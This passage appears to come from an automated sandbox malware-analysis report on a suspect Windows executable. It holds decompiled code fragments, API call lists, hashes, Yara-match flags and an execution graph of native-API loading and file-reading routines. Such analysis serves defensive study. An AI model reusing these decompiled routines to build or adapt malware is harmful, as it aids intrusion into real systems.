				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                      0x004056dd
                      0x004056df
                      0x00405707
                      0x004056ec
                      0x004056f1
                      0x004056fc
                      0x00000000
                      0x00405719
                      0x00405705
                      0x00405705
                      0x00000000

                      APIs
                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                      • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                      • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: lstrlen$CharNextlstrcmpi
                      • String ID:
                      • API String ID: 190613189-0
                      • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                      • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                      • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                      • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Analysis Process: nji3Lg1ot6.exe PID: 6920 Parent PID: 5092 nji3Lg1ot6.exeCOMMON

                      Execution Graph

                      Execution Coverage:4.1%
                      Dynamic/Decrypted Code Coverage:2.7%
                      Signature Coverage:5.7%
                      Total number of Nodes:560
                      Total number of Limit Nodes:71

                      Graph

                      execution_graph 33191 41f0f0 33192 41f0fb 33191->33192 33194 41b960 33191->33194 33195 41b986 33194->33195 33202 409d30 33195->33202 33197 41b992 33198 41b9b3 33197->33198 33210 40c1b0 33197->33210 33198->33192 33200 41b9a5 33246 41a6a0 33200->33246 33249 409c80 33202->33249 33204 409d3d 33205 409d44 33204->33205 33261 409c20 33204->33261 33205->33197 33211 40c1d5 33210->33211 33679 40b1b0 33211->33679 33213 40c22c 33683 40ae30 33213->33683 33215 40c252 33245 40c4a3 33215->33245 33692 414390 33215->33692 33217 40c297 33217->33245 33696 408a60 33217->33696 33219 40c2db 33219->33245 33703 41a4f0 33219->33703 33223 40c331 33224 40c338 33223->33224 33715 41a000 33223->33715 33225 41bdb0 2 API calls 33224->33225 33227 40c345 33225->33227 33227->33200 33229 40c382 33230 41bdb0 2 API calls 33229->33230 33231 40c389 33230->33231 33231->33200 33232 40c392 33233 40f490 3 API calls 33232->33233 33234 40c406 33233->33234 33234->33224 33235 40c411 33234->33235 33236 41bdb0 2 API calls 33235->33236 33237 40c435 33236->33237 33720 41a050 33237->33720 33240 41a000 2 API calls 33241 40c470 33240->33241 33241->33245 33725 419e10 33241->33725 33244 41a6a0 2 API calls 33244->33245 33245->33200 33247 41a6bf ExitProcess 33246->33247 33248 41af50 LdrLoadDll 33246->33248 33248->33247 33250 409c93 33249->33250 33300 418bb0 LdrLoadDll 33249->33300 33280 418a60 33250->33280 33253 409ca6 33253->33204 33254 409c9c 33254->33253 33283 41b2a0 33254->33283 33256 409ce3 33256->33253 33294 409aa0 33256->33294 33258 409d03 33301 409620 LdrLoadDll 33258->33301 33260 409d15 33260->33204 33262 409c3a 33261->33262 33263 41b590 LdrLoadDll 33261->33263 33653 41b590 33262->33653 33263->33262 33266 41b590 LdrLoadDll 33267 409c61 33266->33267 33268 40f170 33267->33268 33269 40f189 33268->33269 33661 40b030 33269->33661 33271 40f19c 33665 41a1d0 33271->33665 33275 40f1c2 33278 40f1ed 33275->33278 33672 41a250 33275->33672 33277 41a480 2 API calls 33279 409d55 33277->33279 33278->33277 33279->33197 33302 41a5f0 33280->33302 33284 41b2b9 33283->33284 33315 414a40 33284->33315 33286 41b2d1 33287 41b2da 33286->33287 33354 41b0e0 33286->33354 33287->33256 33289 41b2ee 33289->33287 33372 419ef0 33289->33372 33630 407ea0 33294->33630 33296 409ac1 33296->33258 33297 409aba 33297->33296 33643 408160 33297->33643 33300->33250 33301->33260 33303 418a75 33302->33303 33305 41af50 33302->33305 33303->33254 33306 41af60 33305->33306 33308 41af82 33305->33308 33309 414e40 33306->33309 33308->33303 33310 414e4e 33309->33310 33311 414e5a 33309->33311 33310->33311 33314 4152c0 LdrLoadDll 33310->33314 33311->33308 33313 414fac 33313->33308 33314->33313 33316 414d75 33315->33316 33326 414a54 33315->33326 33316->33286 33319 414b80 33383 41a350 33319->33383 33320 414b63 33440 41a450 LdrLoadDll 33320->33440 33323 414b6d 33323->33286 33324 414ba7 33325 41bdb0 2 API calls 33324->33325 33328 414bb3 33325->33328 33326->33316 33380 419c40 33326->33380 33327 414d39 33330 41a480 2 API calls 33327->33330 33328->33323 33328->33327 33329 414d4f 33328->33329 33334 414c42 33328->33334 33449 414780 LdrLoadDll NtReadFile NtClose 33329->33449 33331 414d40 33330->33331 33331->33286 33333 414d62 33333->33286 33335 414ca9 33334->33335 33336 414c51 33334->33336 33335->33327 33337 414cbc 33335->33337 33339 414c56 33336->33339 33340 414c6a 33336->33340 33442 41a2d0 33337->33442 33441 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33339->33441 33343 414c87 33340->33343 33344 414c6f 33340->33344 33343->33331 33398 414400 33343->33398 33386 4146e0 33344->33386 33346 414c60 33346->33286 33348 414d1c 33446 41a480 33348->33446 33349 414c7d 33349->33286 33352 414c9f 33352->33286 33353 414d28 33353->33286 33355 41b0f1 33354->33355 33356 41b103 33355->33356 33467 41bd30 33355->33467 33356->33289 33358 41b124 33472 414060 33358->33472 33360 41b170 33360->33289 33361 41b147 33361->33360 33362 414060 3 API calls 33361->33362 33365 41b169 33362->33365 33364 41b1fa 33366 41b20a 33364->33366 33591 41aef0 LdrLoadDll 33364->33591 33365->33360 33497 415380 33365->33497 33507 41ad60 33366->33507 33369 41b238 33586 419eb0 33369->33586 33373 419f0c 33372->33373 33374 41af50 LdrLoadDll 33372->33374 33624 a6967a 33373->33624 33374->33373 33375 419f27 33377 41bdb0 33375->33377 33378 41b349 33377->33378 33627 41a660 33377->33627 33378->33256 33381 41af50 LdrLoadDll 33380->33381 33382 414b34 33381->33382 33382->33319 33382->33320 33382->33323 33384 41a36c NtCreateFile 33383->33384 33385 41af50 LdrLoadDll 33383->33385 33384->33324 33385->33384 33387 4146fc 33386->33387 33388 41a2d0 LdrLoadDll 33387->33388 33389 41471d 33388->33389 33390 414724 33389->33390 33391 414738 33389->33391 33392 41a480 2 API calls 33390->33392 33393 41a480 2 API calls 33391->33393 33394 41472d 33392->33394 33395 414741 33393->33395 33394->33349 33450 41bfc0 LdrLoadDll RtlAllocateHeap 33395->33450 33397 41474c 33397->33349 33399 41444b 33398->33399 33400 41447e 33398->33400 33401 41a2d0 LdrLoadDll 33399->33401 33402 4145c9 33400->33402 33405 41449a 33400->33405 33403 414466 33401->33403 33404 41a2d0 LdrLoadDll 33402->33404 33406 41a480 2 API calls 33403->33406 33410 4145e4 33404->33410 33407 41a2d0 LdrLoadDll 33405->33407 33408 41446f 33406->33408 33409 4144b5 33407->33409 33408->33352 33412 4144d1 33409->33412 33413 4144bc 33409->33413 33463 41a310 LdrLoadDll 33410->33463 33416 4144d6 33412->33416 33417 4144ec 33412->33417 33415 41a480 2 API calls 33413->33415 33414 41461e 33418 41a480 2 API calls 33414->33418 33419 4144c5 33415->33419 33420 41a480 2 API calls 33416->33420 33426 4144f1 33417->33426 33451 41bf80 33417->33451 33421 414629 33418->33421 33419->33352 33422 4144df 33420->33422 33421->33352 33422->33352 33423 414503 33423->33352 33426->33423 33454 41a400 33426->33454 33427 414557 33428 41456e 33427->33428 33462 41a290 LdrLoadDll 33427->33462 33430 414575 33428->33430 33431 41458a 33428->33431 33433 41a480 2 API calls 33430->33433 33432 41a480 2 API calls 33431->33432 33434 414593 33432->33434 33433->33423 33435 4145bf 33434->33435 33457 41bb80 33434->33457 33435->33352 33437 4145aa 33438 41bdb0 2 API calls 33437->33438 33439 4145b3 33438->33439 33439->33352 33440->33323 33441->33346 33443 41af50 LdrLoadDll 33442->33443 33444 414d04 33443->33444 33445 41a310 LdrLoadDll 33444->33445 33445->33348 33447 41a49c NtClose 33446->33447 33448 41af50 LdrLoadDll 33446->33448 33447->33353 33448->33447 33449->33333 33450->33397 33464 41a620 33451->33464 33453 41bf98 33453->33426 33455 41a41c NtReadFile 33454->33455 33456 41af50 LdrLoadDll 33454->33456 33455->33427 33456->33455 33459 41bb86 33457->33459 33458 41bba4 33458->33437 33459->33458 33460 41bf80 2 API calls 33459->33460 33461 41bbbb 33460->33461 33461->33437 33462->33428 33463->33414 33465 41af50 LdrLoadDll 33464->33465 33466 41a63c RtlAllocateHeap 33465->33466 33466->33453 33468 41bd5d 33467->33468 33592 41a530 33467->33592 33468->33358 33595 41a570 33468->33595 33473 414071 33472->33473 33475 414079 33472->33475 33473->33361 33474 41434c 33474->33361 33475->33474 33601 41cf20 33475->33601 33477 4140cd 33478 41cf20 2 API calls 33477->33478 33481 4140d8 33478->33481 33479 414126 33482 41cf20 2 API calls 33479->33482 33481->33479 33606 41cfc0 33481->33606 33484 41413a 33482->33484 33483 41cf20 2 API calls 33486 4141ad 33483->33486 33484->33483 33485 41cf20 2 API calls 33493 4141f5 33485->33493 33486->33485 33488 414324 33613 41cf80 LdrLoadDll RtlFreeHeap 33488->33613 33490 41432e 33614 41cf80 LdrLoadDll RtlFreeHeap 33490->33614 33492 414338 33615 41cf80 LdrLoadDll RtlFreeHeap 33492->33615 33612 41cf80 LdrLoadDll RtlFreeHeap 33493->33612 33495 414342 33616 41cf80 LdrLoadDll RtlFreeHeap 33495->33616 33498 415391 33497->33498 33499 414a40 8 API calls 33498->33499 33501 4153a7 33499->33501 33500 4153fa 33500->33364 33501->33500 33502 4153e2 33501->33502 33503 4153f5 33501->33503 33504 41bdb0 2 API calls 33502->33504 33505 41bdb0 2 API calls 33503->33505 33506 4153e7 33504->33506 33505->33500 33506->33364 33617 41ac20 33507->33617 33510 41ac20 LdrLoadDll 33511 41ad7d 33510->33511 33512 41ac20 LdrLoadDll 33511->33512 33513 41ad86 33512->33513 33514 41ac20 LdrLoadDll 33513->33514 33515 41ad8f 33514->33515 33516 41ac20 LdrLoadDll 33515->33516 33517 41ad98 33516->33517 33518 41ac20 LdrLoadDll 33517->33518 33519 41ada1 33518->33519 33520 41ac20 LdrLoadDll 33519->33520 33521 41adad 33520->33521 33522 41ac20 LdrLoadDll 33521->33522 33523 41adb6 33522->33523 33524 41ac20 LdrLoadDll 33523->33524 33525 41adbf 33524->33525 33526 41ac20 LdrLoadDll 33525->33526 33527 41adc8 33526->33527 33528 41ac20 LdrLoadDll 33527->33528 33529 41add1 33528->33529 33530 41ac20 LdrLoadDll 33529->33530 33531 41adda 33530->33531 33532 41ac20 LdrLoadDll 33531->33532 33533 41ade6 33532->33533 33534 41ac20 LdrLoadDll 33533->33534 33535 41adef 33534->33535 33536 41ac20 LdrLoadDll 33535->33536 33537 41adf8 33536->33537 33538 41ac20 LdrLoadDll 33537->33538 33539 41ae01 33538->33539 33540 41ac20 LdrLoadDll 33539->33540 33541 41ae0a 33540->33541 33542 41ac20 LdrLoadDll 33541->33542 33543 41ae13 33542->33543 33544 41ac20 LdrLoadDll 33543->33544 33545 41ae1f 33544->33545 33546 41ac20 LdrLoadDll 33545->33546 33547 41ae28 33546->33547 33548 41ac20 LdrLoadDll 33547->33548 33549 41ae31 33548->33549 33550 41ac20 LdrLoadDll 33549->33550 33551 41ae3a 33550->33551 33552 41ac20 LdrLoadDll 33551->33552 33553 41ae43 33552->33553 33554 41ac20 LdrLoadDll 33553->33554 33555 41ae4c 33554->33555 33556 41ac20 LdrLoadDll 33555->33556 33557 41ae58 33556->33557 33558 41ac20 LdrLoadDll 33557->33558 33559 41ae61 33558->33559 33560 41ac20 LdrLoadDll 33559->33560 33561 41ae6a 33560->33561 33562 41ac20 LdrLoadDll 33561->33562 33563 41ae73 33562->33563 33564 41ac20 LdrLoadDll 33563->33564 33565 41ae7c 33564->33565 33566 41ac20 LdrLoadDll 33565->33566 33567 41ae85 33566->33567 33568 41ac20 LdrLoadDll 33567->33568 33569 41ae91 33568->33569 33570 41ac20 LdrLoadDll 33569->33570 33571 41ae9a 33570->33571 33572 41ac20 LdrLoadDll 33571->33572 33573 41aea3 33572->33573 33574 41ac20 LdrLoadDll 33573->33574 33575 41aeac 33574->33575 33576 41ac20 LdrLoadDll 33575->33576 33577 41aeb5 33576->33577 33578 41ac20 LdrLoadDll 33577->33578 33579 41aebe 33578->33579 33580 41ac20 LdrLoadDll 33579->33580 33581 41aeca 33580->33581 33582 41ac20 LdrLoadDll 33581->33582 33583 41aed3 33582->33583 33584 41ac20 LdrLoadDll 33583->33584 33585 41aedc 33584->33585 33585->33369 33587 41af50 LdrLoadDll 33586->33587 33588 419ecc 33587->33588 33623 a69860 LdrInitializeThunk 33588->33623 33589 419ee3 33589->33289 33591->33366 33593 41af50 LdrLoadDll 33592->33593 33594 41a54c NtAllocateVirtualMemory 33593->33594 33594->33468 33596 41af50 LdrLoadDll 33595->33596 33597 41a58c 33596->33597 33600 a69a00 LdrInitializeThunk 33597->33600 33598 41a5a7 33598->33358 33600->33598 33602 41cf30 33601->33602 33603 41cf36 33601->33603 33602->33477 33604 41bf80 2 API calls 33603->33604 33605 41cf5c 33604->33605 33605->33477 33607 41cfe5 33606->33607 33608 41d01d 33606->33608 33609 41bf80 2 API calls 33607->33609 33608->33481 33610 41cffa 33609->33610 33611 41bdb0 2 API calls 33610->33611 33611->33608 33612->33488 33613->33490 33614->33492 33615->33495 33616->33474 33618 41ac3b 33617->33618 33619 414e40 LdrLoadDll 33618->33619 33620 41ac5b 33619->33620 33621 414e40 LdrLoadDll 33620->33621 33622 41ad07 33620->33622 33621->33622 33622->33510 33623->33589 33625 a69681 33624->33625 33626 a6968f LdrInitializeThunk 33624->33626 33625->33375 33626->33375 33628 41a67c RtlFreeHeap 33627->33628 33629 41af50 LdrLoadDll 33627->33629 33628->33378 33629->33628 33631 407eb0 33630->33631 33632 407eab 33630->33632 33633 41bd30 3 API calls 33631->33633 33632->33297 33639 407ed5 33633->33639 33634 407f38 33634->33297 33635 419eb0 2 API calls 33635->33639 33636 407f3e 33638 407f64 33636->33638 33640 41a5b0 2 API calls 33636->33640 33638->33297 33639->33634 33639->33635 33639->33636 33641 41bd30 3 API calls 33639->33641 33647 41a5b0 33639->33647 33642 407f55 33640->33642 33641->33639 33642->33297 33644 408176 33643->33644 33645 41a5b0 2 API calls 33644->33645 33646 40817e 33645->33646 33646->33258 33648 41a5cc 33647->33648 33649 41af50 LdrLoadDll 33647->33649 33652 a696e0 LdrInitializeThunk 33648->33652 33649->33648 33650 41a5e3 33650->33639 33652->33650 33654 41b5b3 33653->33654 33657 40ace0 33654->33657 33658 40ad04 33657->33658 33659 40ad40 LdrLoadDll 33658->33659 33660 409c4b 33658->33660 33659->33660 33660->33266 33662 40b053 33661->33662 33664 40b0d0 33662->33664 33677 419c80 LdrLoadDll 33662->33677 33664->33271 33666 41a1da 33665->33666 33667 41af50 LdrLoadDll 33666->33667 33668 40f1ab 33667->33668 33668->33279 33669 41a7c0 33668->33669 33670 41af50 LdrLoadDll 33669->33670 33671 41a7df LookupPrivilegeValueW 33670->33671 33671->33275 33673 41a26c 33672->33673 33674 41af50 LdrLoadDll 33672->33674 33678 a69910 LdrInitializeThunk 33673->33678 33674->33673 33675 41a28b 33675->33278 33677->33664 33678->33675 33680 40b1e0 33679->33680 33681 40b030 LdrLoadDll 33680->33681 33682 40b1f4 33681->33682 33682->33213 33684 40ae3d 33683->33684 33685 40ae41 33683->33685 33684->33215 33686 40ae5a 33685->33686 33687 40ae8c 33685->33687 33730 419cc0 LdrLoadDll 33686->33730 33731 419cc0 LdrLoadDll 33687->33731 33689 40ae9d 33689->33215 33691 40ae7c 33691->33215 33693 4143af 33692->33693 33694 40f490 3 API calls 33693->33694 33695 4143b6 33694->33695 33695->33217 33697 408a79 33696->33697 33732 4087a0 33696->33732 33699 4087a0 19 API calls 33697->33699 33702 408a9d 33697->33702 33700 408a8a 33699->33700 33700->33702 33751 40f700 10 API calls 33700->33751 33702->33219 33704 41af50 LdrLoadDll 33703->33704 33705 41a50c 33704->33705 33872 a698f0 LdrInitializeThunk 33705->33872 33706 40c312 33708 40f490 33706->33708 33709 40f4ad 33708->33709 33873 419fb0 33709->33873 33712 40f4f5 33712->33223 33713 41a000 2 API calls 33714 40f51e 33713->33714 33714->33223 33716 41af50 LdrLoadDll 33715->33716 33717 41a01c 33716->33717 33879 a69780 LdrInitializeThunk 33717->33879 33718 40c375 33718->33229 33718->33232 33721 41af50 LdrLoadDll 33720->33721 33722 41a06c 33721->33722 33880 a697a0 LdrInitializeThunk 33722->33880 33723 40c449 33723->33240 33726 41af50 LdrLoadDll 33725->33726 33727 419e2c 33726->33727 33881 a69a20 LdrInitializeThunk 33727->33881 33728 40c49c 33728->33244 33730->33691 33731->33689 33733 407ea0 5 API calls 33732->33733 33749 4087ba 33732->33749 33733->33749 33734 408a3f 33735 408160 2 API calls 33734->33735 33737 408a49 33735->33737 33737->33697 33740 419ef0 2 API calls 33740->33749 33742 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33742->33749 33743 41a480 LdrLoadDll NtClose 33743->33749 33748 419e10 2 API calls 33748->33749 33749->33734 33749->33737 33749->33740 33749->33742 33749->33743 33749->33748 33752 419d00 33749->33752 33755 4085d0 33749->33755 33769 408120 33749->33769 33774 40f5e0 LdrLoadDll NtClose 33749->33774 33775 419d80 LdrLoadDll 33749->33775 33776 419db0 LdrLoadDll 33749->33776 33777 419e40 LdrLoadDll 33749->33777 33778 4083a0 33749->33778 33794 405f60 LdrLoadDll 33749->33794 33751->33702 33753 419d1c 33752->33753 33754 41af50 LdrLoadDll 33752->33754 33753->33749 33754->33753 33756 4085e6 33755->33756 33795 419870 33756->33795 33758 4085ff 33759 408120 2 API calls 33758->33759 33765 408771 33758->33765 33760 40861f 33759->33760 33760->33765 33816 4081a0 33760->33816 33762 4086e5 33763 4083a0 11 API calls 33762->33763 33762->33765 33764 408713 33763->33764 33764->33765 33766 419ef0 2 API calls 33764->33766 33765->33749 33767 408748 33766->33767 33767->33765 33768 41a4f0 2 API calls 33767->33768 33768->33765 33770 408153 33769->33770 33771 40812b 33769->33771 33770->33749 33771->33749 33771->33770 33772 41a5b0 2 API calls 33771->33772 33773 40817e 33772->33773 33773->33749 33774->33749 33775->33749 33776->33749 33777->33749 33779 4083c9 33778->33779 33851 408310 33779->33851 33782 41a4f0 2 API calls 33784 4083dc 33782->33784 33783 408467 33783->33749 33784->33782 33784->33783 33786 408462 33784->33786 33859 40f660 33784->33859 33785 41a480 2 API calls 33787 40849a 33785->33787 33786->33785 33787->33783 33788 419d00 LdrLoadDll 33787->33788 33789 4084ff 33788->33789 33789->33783 33863 419d40 33789->33863 33791 408563 33791->33783 33792 414a40 8 API calls 33791->33792 33793 4085b8 33792->33793 33793->33749 33794->33749 33796 41bf80 2 API calls 33795->33796 33797 419887 33796->33797 33823 409310 33797->33823 33799 4198a2 33800 4198e0 33799->33800 33801 4198c9 33799->33801 33804 41bd30 3 API calls 33800->33804 33802 41bdb0 2 API calls 33801->33802 33803 4198d6 33802->33803 33803->33758 33805 41991a 33804->33805 33806 41bd30 3 API calls 33805->33806 33807 419933 33806->33807 33813 419bd4 33807->33813 33829 41bd70 33807->33829 33810 419bc0 33811 41bdb0 2 API calls 33810->33811 33812 419bca 33811->33812 33812->33758 33814 41bdb0 2 API calls 33813->33814 33815 419c29 33814->33815 33815->33758 33817 40829f 33816->33817 33818 4081b5 33816->33818 33817->33762 33818->33817 33819 414a40 8 API calls 33818->33819 33820 408222 33819->33820 33821 41bdb0 2 API calls 33820->33821 33822 408249 33820->33822 33821->33822 33822->33762 33824 409335 33823->33824 33825 40ace0 LdrLoadDll 33824->33825 33826 409368 33825->33826 33828 40938d 33826->33828 33833 40cf10 33826->33833 33828->33799 33830 41bd8d 33829->33830 33831 41a570 2 API calls 33830->33831 33832 419bb9 33831->33832 33832->33810 33832->33813 33834 40cf3c 33833->33834 33835 41a1d0 LdrLoadDll 33834->33835 33836 40cf55 33835->33836 33837 40cf5c 33836->33837 33844 41a210 33836->33844 33837->33828 33841 40cf97 33842 41a480 2 API calls 33841->33842 33843 40cfba 33842->33843 33843->33828 33845 41a22c 33844->33845 33846 41af50 LdrLoadDll 33844->33846 33850 a69710 LdrInitializeThunk 33845->33850 33846->33845 33847 40cf7f 33847->33837 33849 41a800 LdrLoadDll 33847->33849 33849->33841 33850->33847 33852 408328 33851->33852 33853 40ace0 LdrLoadDll 33852->33853 33854 408343 33853->33854 33855 414e40 LdrLoadDll 33854->33855 33856 408353 33855->33856 33857 40835c PostThreadMessageW 33856->33857 33858 408370 33856->33858 33857->33858 33858->33784 33860 40f673 33859->33860 33866 419e80 33860->33866 33864 41af50 LdrLoadDll 33863->33864 33865 419d5c 33864->33865 33865->33791 33867 419e9c 33866->33867 33868 41af50 LdrLoadDll 33866->33868 33871 a69840 LdrInitializeThunk 33867->33871 33868->33867 33869 40f69e 33869->33784 33871->33869 33872->33706 33874 41af50 LdrLoadDll 33873->33874 33875 419fcc 33874->33875 33878 a699a0 LdrInitializeThunk 33875->33878 33876 40f4ee 33876->33712 33876->33713 33878->33876 33879->33718 33880->33723 33881->33728 33884 a69540 LdrInitializeThunk

                      Executed Functions

                      Function 0041A3FB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 41a3fb-41a449 call 41af50 NtReadFile
                      APIs
                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !JA$bMA$bMA
                      • API String ID: 2738559852-4222312340
                      • Opcode ID: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                      • Instruction ID: 49720b7d66a93349e3bd369c002c8e5e6a417abb72e5e273f09933de7181dcef
                      • Opcode Fuzzy Hash: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                      • Instruction Fuzzy Hash: E7F0F4B6200208AFCB14DF89CC91EEB77A9EF8C714F168259FE1D97241D630E811CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A400, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                      C-Code - Quality: 37%
                      			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                      0x0041a403
                      0x0041a40f
                      0x0041a417
                      0x0041a41c
                      0x0041a422
                      0x0041a43d
                      0x0041a445
                      0x0041a449

                      APIs
                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !JA$bMA$bMA
                      • API String ID: 2738559852-4222312340
                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040ACE0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 244 40ace0-40acfc 245 40ad04-40ad09 244->245 246 40acff call 41cc40 244->246 247 40ad0b-40ad0e 245->247 248 40ad0f-40ad1d call 41d060 245->248 246->245 251 40ad2d-40ad30 248->251 252 40ad1f-40ad2a call 41d2e0 248->252 254 40ad36-40ad3e 251->254 255 40ad31 call 41b490 251->255 252->251 257 40ad40-40ad54 LdrLoadDll 254->257 258 40ad57-40ad5a 254->258 255->254 257->258
                      C-Code - Quality: 70%
                      			E0040ACE0(void* __eflags, void* _a4, signed char _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				intOrPtr _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041CC40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_push(_v8);
					_t17 = E0041D060(_t24, __eflags);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t28 = _v8;
					asm("cld");
					_t18 = E0041B490(_t28);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}














                      0x0040ace9
                      0x0040acfc
                      0x0040acff
                      0x0040ad04
                      0x0040ad09
                      0x0040ad12
                      0x0040ad13
                      0x0040ad18
                      0x0040ad1b
                      0x0040ad1d
                      0x0040ad25
                      0x0040ad2a
                      0x0040ad2a
                      0x0040ad2d
                      0x0040ad2f
                      0x0040ad31
                      0x0040ad39
                      0x0040ad3c
                      0x0040ad3e
                      0x0040ad52
                      0x00000000
                      0x0040ad54
                      0x0040ad5a
                      0x0040ad0e
                      0x0040ad0e
                      0x0040ad0e

                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A34A, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 259 41a34a-41a3a1 call 41af50 NtCreateFile
                      C-Code - Quality: 64%
